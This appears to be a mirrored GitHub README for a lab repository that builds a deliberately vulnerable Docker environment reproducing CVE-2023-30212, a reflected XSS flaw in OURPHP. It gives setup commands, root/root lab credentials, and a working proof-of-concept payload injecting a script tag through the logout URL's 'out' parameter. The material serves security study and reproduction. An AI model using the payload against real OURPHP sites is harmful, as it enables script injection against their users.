Giters

VisDev23 / Vulnerable-Docker--CVE-2023-30212-

This contains the necessary files and Docker to replicate A vulnerability in OURPHP that has a XSS Vulnerability (CVE-2023-30212)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Vulnerable-Docker-CVE-2023-30212-

This contains the necessary directories and Dockerfile to replicate A vulnerabality in OURPHP that has a XSS Vulnerability (CVE-2023-30212).

Creating a Vulnerable Docker Environment (CVE-2023-30212)

PRE-REQUISITS

Download Docker sudo apt install -y docker.io

Follow below commands step by step:

Download the files from this repository using git clone git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git .

This contains necessary directories and dockerfile to replicate the scenario.

After Downloading the files , build a docker image using sudo docker build -t <Give_Suitable_Docker_name> . .

! Add a name to the Docker image so that it can be called later.

Convert the Docker image into a container by using sudo docker run -d -p 80:80 <Docker_Image_Name> .

! Here the container port is mapped to port 80.

To see the status of the docker container , sudo docker ps

After doing these steps,

Enter the localhost and configure OURPHP with following credentials. Username : root Password : root Database Name: data

Now you need to configure username and password for Administrative. Set the following: Username: root Password: root and proceed

So our payload is /client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>

add this along with localhost or 127.0.0.1 to trigger XSS.

About

This contains the necessary files and Docker to replicate A vulnerability in OURPHP that has a XSS Vulnerability (CVE-2023-30212)

Languages

Language:PHP 45.8%Language:JavaScript 27.1%Language:HTML 21.1%Language:CSS 5.9%Language:Smarty 0.1%Language:Dockerfile 0.0%